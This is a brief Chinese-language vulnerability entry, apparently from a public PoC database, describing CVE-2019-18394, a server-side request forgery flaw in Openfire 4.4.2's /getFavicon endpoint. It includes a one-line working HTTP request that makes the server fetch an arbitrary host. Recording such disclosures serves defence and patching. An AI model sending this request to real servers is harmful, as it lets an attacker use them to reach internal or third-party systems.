Openfire /getFavicon 服务端请求伪造漏洞(CVE-2019-18394)

2026-04-30 Openfire PoC Public

Description

Openfire(以前称为Wildfire和Jive Messenger)是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序,将其自身定位为中型企业控制内部通信并简化即时消息传递的平台。在Ignite Realtime Openfire 4.4.2版本中,FaviconServlet.java中的服务器端请求伪造(SSRF)漏洞允许攻击者发送任意HTTP GET请求。

PoC

GET /getFavicon?host=baidu.com/ HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities